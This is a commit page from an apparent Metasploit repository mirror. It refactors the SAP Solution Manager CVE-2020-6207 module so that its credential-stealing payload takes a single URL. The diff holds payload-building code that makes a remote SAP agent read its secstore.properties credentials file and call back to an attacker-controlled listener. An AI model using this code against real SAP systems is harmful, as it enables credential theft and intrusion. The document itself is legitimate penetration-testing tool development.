adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update #make_steal_credentials_payload to just take url

Browse Source
This commit is contained in:
Spencer McIntyre
2026-02-26 11:45:54 -05:00
parent 1b528c78f0
commit 3f2a07bdca
2 changed files with 4 additions and 6 deletions
Download Patch File Download Diff File Expand all files Collapse all files
lib/msf/core/exploit/remote/http/sap_sol_man_eem_miss_auth.rb
+2 -2
View File
@@ -49,8 +49,8 @@ module Msf
end
# Make payload for steal credentials for SolMan server from agent
def make_steal_credentials_payload(instance, host, port, url)
command = "var u = new Packages.java.net.URL(\"http://#{host}:#{port}#{url}\");"
def make_steal_credentials_payload(instance, url)
command = "var u = new Packages.java.net.URL(\"#{url}\");"
command << 'var o = Packages.java.lang.System.getProperty("os.name").toLowerCase();'
command << 'if (o.indexOf("win") >= 0) '
command << "{var p = Packages.java.nio.file.Paths.get(\"C:\\\\usr\\\\sap\\\\DAA\\\\#{instance}\\\\SMDAgent\\\\configuration\\\\secstore.properties\");} "
modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
+2 -4
View File
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('SSRF_METHOD', [true, 'HTTP method for SSRF', 'GET'], conditions: %w[ACTION == SSRF]),
OptString.new('SSRF_URI', [true, 'URI for SSRF', 'http://127.0.0.1:80/'], conditions: %w[ACTION == SSRF]),
OptString.new('COMMAND', [true, 'Command for execute in agent', 'id'], conditions: %w[ACTION == EXEC]),
OptAddress.new('SRVHOST', [ true, 'The local IP address to listen HTTP requests from agents', '192.168.1.1' ], conditions: %w[ACTION == SECSTORE]),
OptAddressRoutable.new('SRVHOST', [ false, 'The local IP address to listen HTTP requests from agents' ], conditions: %w[ACTION == SECSTORE]),
OptPort.new('SRVPORT', [ true, 'The local port to listen HTTP requests from agents', 8000 ], conditions: %w[ACTION == SECSTORE]),
OptString.new('AGENT', [true, 'Agent server name for exec command or SSRF', 'agent_server_name'], conditions: ['ACTION', 'in', %w[SSRF EXEC SECSTORE]]),
]
@@ -68,8 +68,6 @@ class MetasploitModule < Msf::Auxiliary
def setup_xml_and_variables
@host = datastore['RHOSTS']
@port = datastore['RPORT']
@srv_host = srvhost
@srv_port = datastore['SRVPORT']
@path = datastore['TARGETURI']
@agent_name = datastore['AGENT']
@@ -255,7 +253,7 @@ class MetasploitModule < Msf::Auxiliary
}
}
)
@creds_payload = make_steal_credentials_payload(agent[:instanceName], @srv_host, @srv_port, "/#{@script_name}")
@creds_payload = make_steal_credentials_payload(agent[:instanceName], get_uri("/#{@script_name}")
print_status("Start script: #{@script_name} with payload for retrieving SolMan credentials file from agent: #{@agent_name}")
send_soap_request(make_soap_body(@agent_name, @script_name, @creds_payload))